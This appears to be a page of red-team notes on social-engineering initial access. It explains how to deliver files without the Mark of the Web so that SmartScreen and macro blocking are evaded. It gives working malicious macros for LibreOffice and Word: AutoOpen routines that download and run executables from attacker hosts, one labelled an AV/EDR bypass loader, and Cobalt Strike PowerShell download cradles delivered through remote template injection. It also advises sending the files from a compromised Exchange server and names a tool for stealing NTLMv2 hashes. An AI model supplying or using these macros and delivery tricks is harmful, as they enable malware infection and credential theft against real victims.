Social Engineering

MOTW (Mark of the Web) is a metadata tag added by Windows to files downloaded from the internet. It’s stored as an Alternate Data Stream (Zone.Identifier) and tells the OS that the file came from an untrusted source (e.g., browser download, email attachment).

For Red Teamers, MOTW matters because it can trigger security features like SmartScreen, AMSI, or macro blocking in Office. Files marked with MOTW are more likely to be flagged, blocked, or require user interaction.

To increase payload execution success, it's crucial to deliver files without MOTW. Common ways to avoid it include:

Using internal delivery methods (e.g., compromised Exchange, shared drives)
Hosting files over SMB/WebDAV
Packaging payloads in ZIPs without MOTW (e.g., ZIPs created locally or transferred via trusted channels)
Using scripts or LOLBins that write the payload to disk without MOTW

Bottom line: No MOTW = fewer defenses triggered = higher success rate.

Macros

Macro for Libre Office

REM  *****  BASIC  *****

Sub InitialAccess
	Shell("cmd /c powershell IWR -URI http://10.8.5.48:8081/http-vulnlabs-4444.exe -Outfile C:\Windows\Temp\http-vulnlabs-4444.exe")
	Shell("cmd /c 'C:\Windows\Temp\http-vulnlabs-4444.exe'")
End Sub

Macro for MS Word

Loader Bypass AV/EDR: Bypass AV/EDR via DInvoke + Sliver

Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long

Sub AutoOpen()
    URLDownloadToFileA 0, "http://10.8.5.48/Loader.exe", "C:\Windows\system32\spool\drivers\color\Loader.exe", 0, 0
    WinExec "C:\Windows\system32\spool\drivers\color\Loader.exe", SHOW_HIDE
End Sub

Word Malicious Macro with Cobalt Strike

Simple Macro

Create a blank document
View > Macros > Select document
1. Attacks > Scripted Web Delivery (S)
  1. Set URI Path
  2. Set Host (nickelviper.com)
  3. Set Port (80)
  4. Set Listener HTTP/DNS
  5. Set type: Powershell
  6. Enable Use X64 Payload
    Copy the payload and set it into the macro.

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
	Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""

End Sub

Save as .doc .
Send the file whether via email from a compromise Exchange to avoid the MOTW or any methods you want.

Remote Template injection

Create a blank document
View > Macros > Select document
1. Attacks > Scripted Web Delivery (S)
  1. Set URI Path
  2. Set Host (nickelviper.com)
  3. Set Port (80)
  4. Set Listener HTTP/DNS
  5. Set type: Powershell
  6. Enable Use X64 Payload
    Copy the payload and set it into the macro.

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
	Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""

End Sub

Save as .dot .
Host the file (python server|Cobalt Striket Server)
Create a new black template
1. Save as .docx
By using 1-zip click on file
1. Go to Word > _rels > settings.xml.rels
  1. Modify the target parameter within the settings.xml.rels file with the .dot file you created before and is hosted.
Send the file whether via email from a compromise Exchange to avoid the MOTW or any methods you want.

Capturing NTLMv2 Hashes

If you see you possess Write permission over public SMB share in your target domain or you see the website accepts uploading files you could use tools such as ntlm_theft to create a malicious files and steal NTLMv2 Hash

Some places to steal NTLMV2 Hashes

PreviousCode Snippets NextPortforwarding and tunneling

Last updated 3 days ago